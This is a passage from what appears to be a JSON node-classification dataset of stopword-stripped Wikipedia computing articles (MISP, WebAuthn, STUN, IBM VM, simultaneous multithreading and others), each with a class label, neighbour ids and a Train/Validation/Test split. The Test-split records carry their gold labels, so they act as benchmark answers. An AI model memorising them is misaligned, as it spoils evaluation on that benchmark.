    "text": "Malware_Information_Sharing_Platform:malware information sharing platform malware information sharing platform misp open source threat intelligence platform project develops utilities documentation effective threat intelligence sharing indicators compromise several organizations run misp instances listed website project started around june 2011 christophe vandeplas frustration way many indicators compromise iocs shared email pdf documents parseable automatic machines home started play around cakephp made proof concept idea called cydefsig cyber defence signatures mid july 2011 presented personal project work belgian defence feedback rather positive giving access cydefsig running personal server belgian defence started use cydefsig officially starting mid august 2011 christophe allowed spend time cydefsig work-hours still working home point nato heard project january 2012 first presentation done introduce depth project looked products marked offered seemed deemed openness cydefsig great advantage andrzej dereszowski first part-time developer nato side one thing led another months later nato hired full-time developer improve code add features collaborative development started date many personal projects license explicitly written yet collaboratively decided project would released publicly affero gpl license share code many people possible protect harm project renamed misp malware information sharing project name invented alex vandurme nato january 2013 andras iklody became main full-time developer misp day initially hired nato evening week-end contributor open source project meanwhile organisations started adopt software promoted around cert world cert-eu circl many others nowadays andras iklody lead developer misp project works circl misp project expanded misp covering malware indicators also fraud vulnerability information name misp threat sharing includes core misp software myriad tools pymisp format core format misp taxonomies warning-lists support misp misp community project lead team volunteers project funded european union connecting europe facility computer incident response center luxembourg indicators compromise managed misp may originate variety sources including internal incident investigation teams intelligence sharing partners commercial intelligence sources commercial sources integration misp include symantec deepsight intelligence kaspersky threat feeds mcafee active response misp integrations open-source commercial threat intelligence platforms include eclecticiq platform",
    "neighbors": [
      8580,
      8644,
      2090,
      9614,
      756
    ],
    "mask": "None"
  },
  {
    "node_id": 7211,
    "label": 3,
    "text": "Macintosh_IIsi:macintosh iisi macintosh iisi personal computer designed manufactured sold apple computer inc. october 1990 march 1993 introduced lower-cost alternative macintosh ii family desktop models popular home use offered expandability performance macintosh lc introduced time like lc built-in sound support well support color displays maximum screen resolution 640×480 eight-bit color iisi remained market two half years discontinued shortly introduction replacement centris 610 iisi case design compact three-box desktop unit used macintosh model one macintosh models true positioned macintosh iici apple entry-level professional model iisi price lowered redesign motherboard substituting different memory controller deletion one expansion card slots single processor direct slot removal level 2 cache slot shipped either 40-mb 80-mb internal hard disk 1.44-mb floppy disk drive mc 68882 fpu optional upgrade mounted special plug-in card ports included scsi two serial ports adb port floppy drive port 3.5mm stereo headphone sound output microphone sound input sockets bridge card available iisi convert processor direct slot standard internal nubus card slot compatible machines macintosh ii family bridge card included math co-processor improve floating-point performance nubus card mounted horizontally motherboard cut costs iisi video shared main system memory also effect slowing video considerably especially iisi 1 mb slow ram soldered motherboard david pogue book macworld macintosh secrets observed one could speed video considerably one set disk cache size large enough force computer draw video ram faster ram installed simm banks iisi also suffers sound difficulties time speaker contacts fail causing sound periodically drop problem caused modular construction computer mono loudspeaker daughterboard motherboard springy contacts speaker vibrations led fretting touching surfaces problem could solved removing motherboard using pencil eraser clean contacts daughterboard holding loudspeaker iisi macintosh use case design issues never corrected subsequent model iisi designed easily cheaply manufactured tools required put one together – everything held place clips latches heritage cut-down iici simple modification substitute new clock crystal increase system clock rate 25 mhz slight increase performance charles bukowski enthusiastic user iisi",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      1461,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      10224,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 7212,
    "label": 4,
    "text": "WebAuthn:webauthn webauthn web authentication web standard published world wide web consortium w3c webauthn core component fido2 project guidance fido alliance goal project standardize interface authenticating users web-based applications services using public-key cryptography client side support webauthn implemented variety ways underlying cryptographic operations performed authenticator abstract functional model mostly agnostic respect key material managed makes possible implement support webauthn purely software making use processor trusted execution environment trusted platform module tpm sensitive cryptographic operations also offloaded roaming hardware authenticator turn accessed via usb bluetooth low energy near-field communications nfc roaming hardware authenticator conforms fido client authenticator protocol ctap making webauthn effectively backward compatible fido universal 2nd factor u2f standard similar legacy u2f web authentication resilient verifier impersonation resistant active man-in-the-middle-attacks unlike u2f webauthn require traditional password moreover roaming hardware authenticator resistant malware since private key material time accessible software running host machine webauthn level 1 standard published w3c recommendation 4 march 2019 level 2 specification development fido2 successor fido universal 2nd factor u2f legacy protocol fido2 authentication advantages u2f—the primary difference fido2 authenticator also multi-factor authenticator fido2 authenticator may used either single-factor mode multi-factor mode single-factor mode authenticator activated test user presence usually consists simple button push multi-factor mode authenticator something performs user verification depending authenticator capabilities case authenticator performs user verification locally device secret biometric stored authenticator shared website moreover single secret biometric works websites authenticator select correct cryptographic key material use service requesting authentication user verification completed successfully secret biometric authenticator used together similarly would used smartphone example fingerprint used provide convenient access smartphone occasionally fingerprint access fails case pin used like predecessor fido u2f w3c web authentication webauthn involves website web browser authenticator webauthn specifies claimant demonstrates possession control fido2 authenticator verifier called webauthn relying party authentication process mediated entity called webauthn client little conforming web browser purposes illustration assume authenticator roaming hardware authenticator see options case authenticator multi-factor cryptographic authenticator uses public-key cryptography sign authentication assertion targeted webauthn relying party assuming authenticator uses pin user verification authenticator something pin something know initiate webauthn authentication flow webauthn relying party indicates intentions webauthn client i.e. browser via javascript webauthn client communicates authenticator using javascript api implemented browser roaming authenticator conforms fido client authenticator protocol webauthn strictly require roaming hardware authenticator alternatively software authenticator implemented smartphone e.g platform authenticator i.e. authenticator implemented directly webauthn client device may used relevant examples platform authenticators include windows hello android operating system illustrated flow relies pin-based user verification terms usability modest improvement ordinary password authentication practice use biometrics user verification improve usability webauthn logistics behind biometrics still poorly understood however lingering misunderstanding among users biometric data transmitted network manner passwords case webauthn relying party receives signed authentication assertion browser digital signature assertion verified using trusted public key user webauthn relying party obtain trusted public key first place obtain public key user webauthn relying party initiates webauthn registration flow similar authentication flow illustrated primary difference authenticator signs attestation statement attestation private key signed attestation statement contains copy public key webauthn relying party ultimately uses verify signed authentication assertion attestation statement also contains metadata describing authenticator digital signature attestation statement verified trusted attestation public key particular model authenticator webauthn relying party obtains store trusted attestation public keys unspecified one option use fido metadata service attestation type specified javascript determines trust model instance attestation type called self-attestation may desired trust model essentially trust first use webauthn level 1 standard published w3c recommendation web authentication working group 4 march 2019 webauthn supported following web browsers google chrome mozilla firefox microsoft edge apple safari preview webauthn also supported opera web browser desktop version google chrome supported webauthn since version 67 firefox fully supported previous fido u2f standard included enabled webauthn firefox version 60 released may 9 2018 early windows insider release microsoft edge build 17682 implemented version webauthn works windows hello well external security keys existing fido u2f security keys largely compatible webauthn standard though webauthn added ability reference unique per-account user handle identifier older authenticators unable store one first fido2-compatible authenticators second-generation security key yubico announced april 10 2018 first security level 2 certified fido2 key called goldengate announced one year later ewbm april 8 2019. dropbox announced support webauthn logins 2nd factor may 8 2018 webauthn implements extension w3c general credential management api attempt formalize interaction websites web browsers exchanging user credentials web authentication api extends credential management codice_1 codice_2 javascript methods accept codice_3 parameter codice_4 method used registering public key authenticators part associating user accounts possibly initial account creation time likely adding new security device existing account codice_5 method used authenticating logging check browser supports webauthn scripts check codice_6 interface defined addition codice_7 standard also defines codice_8 codice_9 codice_10 interfaces addition variety dictionaries datatypes api allow direct access manipulation private keys beyond requesting initial creation august 2018 paragon initiative enterprises security audit upcoming webauthn standard could find specific exploits revealed serious weaknesses way underlying cryptography used mandated standard main points criticism revolve around two potential issues problematic cryptographic systems past therefore avoided order fall victim class attacks paragon initiative enterprises also criticized way standard initially developed proposal made public advance experienced cryptographers asked suggestions feedback hence standard subject broad cryptographic research academic world despite shortcomings paragon initiative enterprises still encourage users continue use webauthn come recommendations potential implementors developers standard hope implemented standard finalized avoiding mistakes early possible would prevent industry challenges introduced broken standards need backwards compatibility ecdaa used combination device attestation particular feature webauthn necessarily required authentication work current implementations allow user decide whether attestation statement sent registration ceremony independently relying parties choose require attestation",
    "neighbors": [
      7936,
      3462,
      1802,
      10506,
      9229,
      4623,
      11154,
      1556,
      1054,
      5918,
      10020,
      10026,
      6316,
      10284,
      177,
      4658,
      2485,
      7354,
      1083,
      1468,
      4797,
      6975,
      8644,
      10566,
      3271,
      11466,
      3920,
      5078,
      10071,
      5593,
      5849,
      9690,
      1501,
      6366,
      10207,
      865,
      8674,
      4326,
      7784,
      9834,
      8689,
      9841,
      7796,
      124,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 7213,
    "label": 3,
    "text": "Compaq_Presario_V6000:compaq presario v6000 compaq presario v6000 series widescreen 15.4 nowiki /nowiki laptop computers manufactured hewlett packard includes v6000z series based amd processors mobile sempron dual core turion x2 v6000t based intel processors repeated reliability issues amd based v6000z laptops fan algorithm bios misconfigured causing overheating damage wireless cards motherboard late 2007 hp extended limited warranty cover defects however date limited 2 years purchase product computer shows faults 2-year period hewlett packard repair despite fault cause australia resulted action queensland office fair trading hewlett packard misrepresenting customers rights resulting agreed au 3 million settlement computer available following processors max screen resolution 1280x800 nvidia geforce go 6150 intel x3100 depending cpu family nvidia geforce go 7150m intel gma 950 memory expandable 3 gb memory built wireless lan receiver intel r pro/wireless 3945abg broadcom equipped 802.1g bluetooth powered hp software upgrade windows 7 ultimate 32-bit possible problems reported many hp pavilion dv9000 laptop computers well",
    "neighbors": [
      1776,
      6765
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7214,
    "label": 5,
    "text": "STUN:stun session traversal utilities nat stun standardized set methods including network protocol traversal network address translator nat gateways applications real-time voice video messaging interactive communications stun tool used protocols interactive connectivity establishment ice session initiation protocol sip webrtc provides tool hosts discover presence network address translator discover mapped usually public internet protocol ip address port number nat allocated application user datagram protocol udp flows remote hosts protocol requires assistance third-party network server stun server located opposing public side nat usually public internet originally stun acronym simple traversal user datagram protocol udp network address translators title changed specification updated set methods published rfc 5389 retaining acronym stun tool communications protocols detect traverse network address translators located path two endpoints communication implemented light-weight client-server protocol requiring simple query response components third-party server located common easily accessible network typically internet client side implemented user communications application voice internet protocol voip phone instant messaging client basic protocol operates essentially follows client typically operating inside private network sends binding request stun server public internet stun server responds success response contains ip address port number client observed server perspective result obfuscated exclusive xor mapping avoid translation packet content application layer gateways algs perform deep packet inspection attempt perform alternate nat traversal methods stun messages sent user datagram protocol udp packets since udp provide reliable transport guarantees reliability achieved application-controlled retransmissions stun requests stun servers implement reliability mechanism responses reliability mandatory transmission control protocol tcp may used induces extra networking overhead security-sensitive applications stun may transported encrypted transport layer security tls application may automatically determine suitable stun server communications particular peer querying domain name system dns stun udp stuns tcp/tls server srv resource record e.g. _stun._udp.example.com standard listening port number stun server 3478 udp tcp 5349 tls alternatively tls may also run tcp port server implementation de-multiplex tls stun packets case stun server found using dns lookups standard recommends destination domain name queried address records aaaa would used default port numbers addition using protocol encryption tls stun also built-in authentication message-integrity mechanisms via specialized stun packet types client evaluated external address use candidate communicating peers sharing external nat address rather private address reachable peers public network communicating peers located different private networks behind nat peers must coordinate determine best communication path nat behavior may restrict peer connectivity even public binding known interactive connectivity establishment ice protocol provides structured mechanism determine optimal communication path two peers session initiation protocol sip extensions defined enable use ice setting call two hosts network address translation implemented via number different address port mapping schemes none standardized stun self-contained nat traversal solution applicable nat deployment scenarios work correctly tool among methods tool protocols dealing nat traversal notably traversal using relay nat turn interactive connectivity establishment ice stun work three types nat full cone nat restricted cone nat port restricted cone nat cases restricted cone port restricted cone nats client must send packet endpoint nat allow packets endpoint client stun work symmetric nat also known bi-directional nat often found networks large companies since ip address stun server different endpoint symmetric nat case nat mapping different stun server endpoint turn offers better results symmetric nat original specification stun rfc 3489 specified algorithm characterize nat behavior according address port mapping behavior algorithm reliably successful applicable subset nat devices deployed algorithm consists series tests performed application path diagram ends red box udp communication possible path ends yellow green box communication possible methods rfc 3489 proved unreliable cope plethora different nat implementations application scenarios encountered production networks stun protocol method updated rfc 5389 retaining many original specifications subset methods removing others",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      6541,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      5659,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      2985,
      6951,
      10924,
      2093,
      10417,
      562,
      7859,
      2996,
      9909,
      3770,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      8386,
      7364,
      581,
      2887,
      8265,
      2509,
      4687,
      3792,
      6993,
      5843,
      5972,
      2904,
      5469,
      5470,
      5471,
      5472,
      4068,
      3813,
      10341,
      10344,
      11112,
      367,
      8432,
      755,
      4084,
      6651,
      2685
    ],
    "mask": "Test"
  },
  {
    "node_id": 7215,
    "label": 3,
    "text": "Jazz_(computer):jazz computer jazz computer architecture motherboard chipset design originally developed microsoft use developing windows nt design eventually used basis mips-based windows nt systems part microsoft intended nt portable various microprocessor architectures mips risc architecture chosen one first development platforms nt project late 1980s/early 1990s however around 1990 existing mips-based systems turbochannel-equipped decstation sgi indigo varied drastically standard intel personal computers ibm at—for example neither used isa bus common intel 386-class machines reasons microsoft decided design mips-based hardware platform develop nt resulted jazz architecture later microsoft sold architecture design mips computer systems inc. became mips magnum jazz architecture includes design simple enough powerful enough majority windows nt-capable mips systems based modified versions jazz architecture list systems less based jazz includes jazz systems designed partially comply advanced risc computing arc standard used arc firmware boot windows nt operating systems also ported various jazz implementations risc/os mips magnum also mips systems designed run windows nt comply arc standard nevertheless based jazz platform",
    "neighbors": [
      4356,
      11524,
      780,
      6797,
      782,
      1935,
      8976,
      7442,
      2452,
      10900,
      408,
      11549,
      6942,
      7970,
      1832,
      6827,
      3890,
      11058,
      8757,
      5686,
      4289,
      7234,
      10051,
      6854,
      9033,
      10957,
      4051,
      11221,
      11605,
      6879,
      11103,
      10338,
      617,
      3818,
      8681,
      6252,
      5873,
      3445,
      5368,
      11007
    ],
    "mask": "None"
  },
  {
    "node_id": 7216,
    "label": 8,
    "text": "Web_data_services:web data services web data services refers service-oriented architecture soa applied data sourced world wide web internet whole web data services enable maximal mashup reuse sharing structured data relational tables semi-structured information extensible markup language xml documents unstructured information rss feeds content web applications commercial data online business sources web data services environment applications may subscribe consume information provide publish information others consume applications serve consumer-subscriber and/or provider-publisher web data services include mobile computing web portals enterprise portals online business software social media social networks web data services may support business-to-consumer b2c business-to-business b2b information-sharing requirements increasingly enterprises including web data services soa implementations integrate mashup-style user-driven information sharing business intelligence business process management predictive analytics content management applications according industry analysts speed development web data services enterprises deploy technologies ease discovery extraction movement transformation cleansing normalization joining consolidation access presentation disparate information types diverse internal sources data warehouses customer relationship management crm systems external sources commercial market data aggregators web data services build industry-standard protocols interfaces formats integration patterns used soa web 2.0 web-oriented architecture representational state transfer rest addition operating public internet web data services may run solely within corporate intranets across b2b supply chains even span hosted software-as-a-service saas cloud computing environments",
    "neighbors": [
      4194,
      4107,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 7217,
    "label": 2,
    "text": "VM_(operating_system):vm operating system vm often vm/cms family ibm virtual machine operating systems used ibm mainframes system/370 system/390 zseries system z compatible systems including hercules emulator personal computers first version released 1972 vm/370 officially virtual machine facility/370 system/370 reimplementation earlier cp/cms operating system milestone versions included vm/sp current version z/vm still widely used one main full virtualization solutions mainframe market cms usually coupled vm name refers conversational monitor system single-user operating system developed provide conversational time-sharing vm heart vm architecture control program hypervisor called vm-cp usually cp sometimes ambiguously vm runs physical hardware creates virtual machine environment vm-cp provides full virtualization physical machine – including i/o privileged operations performs system resource-sharing including device management dispatching virtual storage management traditional operating system tasks vm user provided separate virtual machine address space virtual devices etc. capable running software could run stand-alone machine given vm mainframe typically runs hundreds thousands virtual machine instances vm-cp began life cp-370 reimplementation cp-67 reimplementation cp-40 running within virtual machine another guest operating system might one time cms capable running bare machine true operating system though configuration would unusual runs guest os vm cms relies hypervisor interface vm-cp perform file system operations request vm services paravirtualization interface ibm coined term hypervisor 360/65 later used diag handler cp-67 diagnose instruction '83 x—no mnemonic privileged instruction originally intended ibm perform built-in diagnostic functions model-dependent functions vm/370 repurposed communication virtual machine cp instruction contains two four-bit register numbers called rx ry contain operand storage addresses return codes passed diagnose interface two-byte code cp uses determine diagnose function perform available diagnose functions listed early history vm described articles cp/cms history cp/cms vm/370 reimplementation cp/cms made available 1972 part ibm system/370 advanced function announcement added virtual memory hardware operating systems system/370 series early releases vm vm/370 release 6 continued open source today considered public domain policy ended late 1970s chargeable vm/se vm/bse upgrades 1980 vm/system product vm/sp however ibm continued providing updates source form existing code many years cp-67 privileged instructions virtual machine cause program interrupt cp simulated behavior privileged instruction vm remained important platform within ibm used operating system development time-sharing use customers remained ibm operating system os dos families remained ibm strategic products customers encouraged run vm formed close working relationships continuing community-support model early cp/cms users meantime system struggled political infighting within ibm resources available project compared ibm efforts basic problem system seen ibm field sales level vm/cms demonstrably reduced amount hardware needed support given number time-sharing users ibm business selling computer systems melinda varian provides fascinating quote illustrating vm unexpected success marketing forecasts vm/370 predicted one 168 would ever run vm entire life product fact first 168 delivered customer ran cp cms ten years later ten percent large processors shipped poughkeepsie would destined run vm would substantial portion mid-range machines built endicott fifteen years passed would vm licenses mvs licenses pc dos version runs xt/370 later at/370 called vm/pc vm/pc 1.1 based vm/sp release 3 ibm introduced system/370 extended architecture 3081 customers faced need run production mvs/370 system testing mvs/xa machine ibm solution vm/xa migration aid used new start interpretive execution sie instruction run virtual machine sie automatically handled privileged instructions returned cp cases could n't handle processor resource/system manager pr/sm later 3090 also used sie several vm/xa products eventually supplanted vm/esa z/vm vm role changed within ibm hardware evolution led significant changes processor architecture backward compatibility remained cornerstone ibm mainframe family still uses basic instruction set introduced original system/360 need efficient use 64-bit zseries made vm approach much attractive vm also utilized data centers converting dos/vse mvs useful running mainframe aix linux platforms become increasingly important current z/vm platform finally achieved recognition within ibm vm users long felt deserved z/vm sites run thousands simultaneous virtual machine users single system z/vm first released october 2000 remains active use development ibm third parties offered many applications tools run vm examples include ramis focus spss nomad db2 rexx racf officevision current vm offerings run gamut mainframe applications including http servers database managers analysis tools engineering packages financial systems release 6 vm/370 control program number commands general users concerned defining controlling user virtual machine lower-case portions command optional early 1980s vm group within share ibm user group sought mascot logo community adopt part response ibm mvs users selecting turkey mascot hilariously chosen according legend mvs performance group early days mvs performance sore topic 1983 teddy bear became vm de facto mascot share 60 teddy bear stickers attached nametags cuddlier oldtimers flag newcomers friendly approached bears hit soon appeared widely bears awarded inductees order knights vm individuals made useful contributions community",
    "neighbors": [
      2560,
      6148,
      7,
      6155,
      6675,
      7187,
      8213,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      553,
      5678,
      10803,
      7733,
      9784,
      10809,
      573,
      576,
      2625,
      3148,
      6221,
      3160,
      10333,
      97,
      11363,
      9829,
      6248,
      6760,
      8298,
      9835,
      10856,
      6772,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      2172,
      3197,
      125,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9361,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      4255,
      9887,
      7848,
      8879,
      3248,
      178,
      9907,
      6837,
      7349,
      6329,
      8889,
      5823,
      1219,
      8388,
      6342,
      1736,
      2248,
      7881,
      9932,
      5840,
      1235,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      242,
      5363,
      9977,
      9466,
      2811,
      3323,
      2813,
      4862,
      1278,
      9468,
      5378,
      10499,
      7943,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      3867,
      284,
      3359,
      10016,
      292,
      10235,
      2345,
      1323,
      7983,
      2355,
      7477,
      8502,
      823,
      10040,
      4409,
      6459,
      7483,
      8509,
      7999,
      11075,
      4423,
      5450,
      5452,
      6988,
      5457,
      6481,
      7507,
      11601,
      5463,
      7511,
      10590,
      863,
      1376,
      3426,
      868,
      3429,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      6529,
      10113,
      4996,
      8069,
      394,
      3978,
      4492,
      909,
      7053,
      8077,
      7057,
      11667,
      11673,
      5531,
      8092,
      6557,
      2462,
      5022,
      3488,
      11675,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      5041,
      7601,
      8627,
      9139,
      10676,
      5562,
      6075,
      6078,
      9151,
      4548,
      11204,
      11205,
      4040,
      8136,
      9166,
      4565,
      10197,
      1501,
      5598,
      10730,
      10731,
      4589,
      8687,
      6128,
      5105,
      5619,
      5115
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7218,
    "label": 3,
    "text": "Simultaneous_multithreading:simultaneous multithreading simultaneous multithreading smt technique improving overall efficiency superscalar cpus hardware multithreading smt permits multiple independent threads execution better utilize resources provided modern processor architectures name multithreading ambiguous multiple threads executed simultaneously one cpu core also multiple tasks different page tables different task state segments different protection rings different i/o permissions etc. although running core completely separated multithreading similar concept preemptive multitasking implemented thread level execution modern superscalar processors simultaneous multithreading smt one two main implementations multithreading form temporal multithreading also known super-threading temporal multithreading one thread instructions execute given pipeline stage time simultaneous multithreading instructions one thread executed given pipeline stage time done without great changes basic processor architecture main additions needed ability fetch instructions multiple threads cycle larger register file hold data multiple threads number concurrent threads decided chip designers two concurrent threads per cpu core common processors support eight concurrent threads per core really efficiency technique inevitably increases conflict shared resources measuring agreeing effectiveness difficult however measured energy efficiency smt parallel native managed workloads historical 130 nm 32 nm intel smt hyper-threading implementations found 45 nm 32 nm implementations smt extremely energy efficient even inorder atom processors modern systems smt effectively exploits concurrency little additional dynamic power even performance gains minimal power consumption savings considerable researchers shown extra threads used proactively seed shared resource like cache improve performance another single thread claim shows smt increase efficiency others use smt provide redundant computation level error detection recovery however current cases smt hiding memory latency increasing efficiency increasing throughput computations per amount hardware used processor design two ways increase on-chip parallelism fewer resource requirements one superscalar technique tries exploit instruction level parallelism ilp multithreading approach exploiting thread level parallelism tlp superscalar means executing multiple instructions time thread-level parallelism tlp executes instructions multiple threads within one processor chip time many ways support one thread within chip namely key factor distinguish look many instructions processor issue one cycle many threads instructions come example sun microsystems ultrasparc t1 known niagara november 14 2005 release multicore processor combined fine-grain multithreading technique instead simultaneous multithreading core issue one instruction time multithreading cpus around since 1950s simultaneous multithreading first researched ibm 1968 part acs-360 project first major commercial microprocessor developed smt alpha 21464 ev8 microprocessor developed dec coordination dean tullsen university california san diego susan eggers henry levy university washington microprocessor never released since alpha line microprocessors discontinued shortly hp acquired compaq turn acquired dec. dean tullsen work also used develop hyper-threading hyper-threading technology htt versions intel pentium 4 microprocessors northwood prescott intel pentium 4 first modern desktop processor implement simultaneous multithreading starting 3.06 ghz model released 2002 since introduced number processors intel calls functionality hyper-threading provides basic two-thread smt engine intel claims 30 speed improvement compared otherwise identical non-smt pentium 4 performance improvement seen application-dependent however running two programs require full attention processor actually seem like one programs slows slightly hyper-threading turned due replay system pentium 4 tying valuable execution resources increasing contention resources bandwidth caches tlbs re-order buffer entries equalizing processor resources two programs adds varying amount execution time pentium 4 prescott core gained replay queue reduces execution time needed replay system enough completely overcome performance hit latest imagination technologies mips architecture designs include smt system known mips mt mips mt provides heavyweight virtual processing elements lighter-weight hardware microthreads rmi cupertino-based startup first mips vendor provide processor soc based eight cores runs four threads threads run fine-grain mode different thread executed cycle threads also assigned priorities imagination technologies mips cpus two smt threads per core ibm blue gene/q 4-way smt ibm power5 announced may 2004 comes either dual core dual-chip module dcm quad-core oct-core multi-chip module mcm core including two-thread smt engine ibm implementation sophisticated previous ones assign different priority various threads fine-grained smt engine turned dynamically better execute workloads smt processor would increase performance ibm second implementation generally available hardware multithreading 2010 ibm released systems based power7 processor eight cores four simultaneous intelligent threads switches threading mode one thread two threads four threads depending number process threads scheduled time optimizes use core minimum response time maximum throughput ibm power8 8 intelligent simultaneous threads per core smt8 ibm z13 two threads per core smt-2 although many people reported sun microsystems ultrasparc t1 known niagara 14 november 2005 release defunct processor codenamed rock originally announced 2005 many delays cancelled 2009 implementations sparc focused almost entirely exploiting smt cmp techniques niagara actually using smt sun refers combined approaches cmt overall concept throughput computing niagara eight cores core one pipeline actually uses fine-grained multithreading unlike smt instructions multiple threads share issue window cycle processor uses round robin policy issue instructions next active thread cycle makes similar barrel processor sun microsystems rock processor different complex cores one pipeline oracle corporation sparc t3 eight fine-grained threads per core sparc t4 sparc t5 sparc m5 m6 m7 eight fine-grained threads per core two executed simultaneously fujitsu sparc64 vi coarse-grained vertical multithreading vmt sparc vii newer 2-way smt intel itanium montecito used coarse-grained multithreading tukwila newer use 2-way smt dual-domain multithreading intel xeon phi 4-way smt time-multiplexed multithreading hardware based threads ca n't disabled unlike regular hyperthreading intel atom released 2008 first intel product feature 2-way smt marketed hyper-threading without supporting instruction reordering speculative execution register renaming intel reintroduced hyper-threading nehalem microarchitecture absence core microarchitecture amd bulldozer microarchitecture flexfpu shared l2 cache multithreaded integer cores module single threaded partial smt implementation amd zen microarchitecture 2-way smt visc architecture uses virtual software layer translation layer dispatch single thread instructions global front end splits instructions virtual hardware threadlets dispatched separate virtual cores virtual cores send available resources physical cores multiple virtual cores push threadlets reorder buffer single physical core split partial instructions data multiple threadlets execution ports time virtual core keeps track position relative output form multithreading increase single threaded performance allowing single thread use resources cpu allocation resources dynamic near-single cycle latency level 1-4 cycles depending change allocation depending individual application needs therefore two virtual cores competing resources appropriate algorithms place determine resources allocated depending design architecture processor simultaneous multithreading decrease performance shared resources bottlenecks performance critics argue considerable burden put software developers test whether simultaneous multithreading good bad application various situations insert extra logic turn decreases performance current operating systems lack convenient api calls purpose preventing processes different priority taking resources also security concern certain simultaneous multithreading implementations intel hyperthreading netburst based processors vulnerability possible one application steal cryptographic key another application running processor monitoring cache use also sophisticated machine learning exploits ht implementation explained black hat 2018",
    "neighbors": [
      3586,
      7173,
      9739,
      2066,
      7699,
      11282,
      5655,
      10779,
      10781,
      6181,
      8231,
      6184,
      3630,
      9774,
      6705,
      2623,
      2113,
      7234,
      3142,
      2638,
      6738,
      9302,
      2140,
      1122,
      4194,
      8292,
      10340,
      3175,
      5223,
      8810,
      4205,
      8815,
      630,
      6774,
      8822,
      7802,
      6268,
      3197,
      643,
      7313,
      146,
      6815,
      8352,
      5793,
      2210,
      6818,
      8863,
      6821,
      5798,
      6311,
      1707,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      2745,
      8890,
      4286,
      2241,
      2243,
      6339,
      9932,
      5329,
      4308,
      10966,
      2264,
      731,
      11487,
      2275,
      8931,
      9445,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      1784,
      249,
      3323,
      8700,
      6909,
      8447,
      9472,
      1798,
      5384,
      1801,
      6924,
      6926,
      6415,
      785,
      1298,
      11539,
      3352,
      7963,
      1309,
      2339,
      6950,
      1321,
      2345,
      4909,
      3886,
      10543,
      306,
      309,
      8501,
      5948,
      4928,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      8523,
      7505,
      9044,
      11604,
      342,
      344,
      2394,
      859,
      11613,
      8543,
      1376,
      11618,
      3431,
      10603,
      4465,
      6004,
      10612,
      1399,
      7033,
      1402,
      894,
      7039,
      3457,
      9092,
      9095,
      1933,
      398,
      3470,
      5518,
      8080,
      8590,
      5523,
      407,
      409,
      10658,
      5541,
      9126,
      2987,
      10669,
      1967,
      2480,
      4017,
      9137,
      10675,
      1461,
      1463,
      6072,
      7607,
      4030,
      1985,
      9665,
      453,
      3014,
      1480,
      7631,
      3025,
      466,
      2008,
      1499,
      10205,
      1502,
      7134,
      5090,
      995,
      7653,
      7142,
      2536,
      7657,
      4587,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 7219,
    "label": 9,
    "text": "AngelScript:angelscript angelscript game-oriented interpreted compiled scripting language angelscript features static typing object handles similar c++ pointers garbage collected via reference counting object-orientation single inheritance multiple inheritance interfaces allows operators registered overloaded angelscript used c++ ide netbeans geany eclipse also supported angeljuice ide developed specifically language c c++ functions called within angelscript environment angelscript class syntax closely follows c++ classes design proxy functions required embed angelscript c++ applications easing two languages integration several differences angelscript c++ angelscript used video game development including amy dustforce gekkeiju online king arthur gold overgrowth puddle rigs rods sine mora star ruler supertuxkart warsow sven co-op jazz jackrabbit 2 plus urho3d angelscript used university ulm interactive 3d-animation program angelscript also used robotics example program behavioral rules robotic agents",
    "neighbors": [
      1952,
      9345,
      5612,
      7983,
      338,
      5395,
      9490,
      9780,
      7894,
      11221,
      2556
    ],
    "mask": "Train"
  },
  {
    "node_id": 7220,
    "label": 2,
    "text": "Nokia_N79:nokia n79 nokia n79 symbian os v9.3 smartphone member nokia nseries multimedia smartphone family running s60 3rd edition feature pack 2 officially announced nokia 26 august 2008 n79 advanced device 5 megapixel camera dual led flash gps many improvements nokia n78 retailed 350 euros upon release october 2008 n79 somewhat vibrant style compared usual nseries devices rotated nokia logo would later appear nokia n97 nokia advertised n79 bold-coloured xpress-on covers change software colour theme cover also slim nseries standards considered attractive features include 2.4-inch display 369 mhz arm11 processor physical keylock switch fm transmitter navi wheel 14 january 2009 nokia announced would ship sports edition dubbed n79 active included bluetooth heart rate monitor armband new version nokia sports tracker application photos music maps navigation video",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      659,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
